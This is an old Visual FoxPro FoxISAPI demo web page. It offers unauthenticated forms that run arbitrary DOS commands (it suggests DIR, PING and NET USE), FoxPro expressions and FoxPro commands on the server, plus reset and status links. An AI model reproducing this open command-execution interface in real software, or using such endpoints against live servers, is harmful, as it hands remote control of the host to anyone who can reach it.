Mini Kabibi Habibi
<HTML>
<head><title>FOXISAPI Fox autogenerated Demo Page</title></head>
<body bgcolor=silver><h1>Cool FOXISAPI Fox Server Demo-rama!</h1>
<font size=4 face="Lucida Console">
<P>
Try out the
<a HREF="/scripts/foxisapi.dll/foxis.employee.startup"><i>VFP OLE CUSTOM SERVER DEMO PAGE</i> </a>
<font size=3>
This runs the FoxISAPI demo that comes with VFP. It allows your browser to run a Fox app, from any remote platforms that can run an Internet browser, including Mac, Unix,etc.!! Users can make a single change which can be inherited by both the HTML and Fox versions of the form!
<hr>
<a href="/scripts/foxisapi.dll/reset"> Reset All FoxIsapi Servers</a><p>
<a href="/scripts/foxisapi.dll/status"> Status of FoXIsapi Servers</a><p>
<font size = 5>
Other goodies:<p>
<font size=3>
<p>
Try a DOS command that will be executed on the server:
<form action = "/scripts/foxisapi.dll/foxis.employee.doscmd">
<input name="Cmd" value = "Reset"><input type="submit" value="Dos Command">
(like DIR or PING or NET USE).
Be careful that you don't type a command that requires interactive input, otherwise the server will be hung
The results will be STDOUT, and not STDERR</form>
<p> <p>
Try a legal Foxpro expression and see it's result<form action =
"/scripts/foxisapi.dll/foxis.employee.foxcmd">
<input name="Cmd"><input type="submit"
value="Fox Expression"> like "today is "+ cdow(date()) or 45 * 3 or SYS(2004)</form>
<p>
<p> <p>
Try a legal Foxpro Command<form action =
"/scripts/foxisapi.dll/foxis.employee.foxdocmd">
<input name="Cmd"><input type="submit"
value="Fox Command"> like "USE products"</form>
<p>
<hr>
<p>
</body>
</HTML>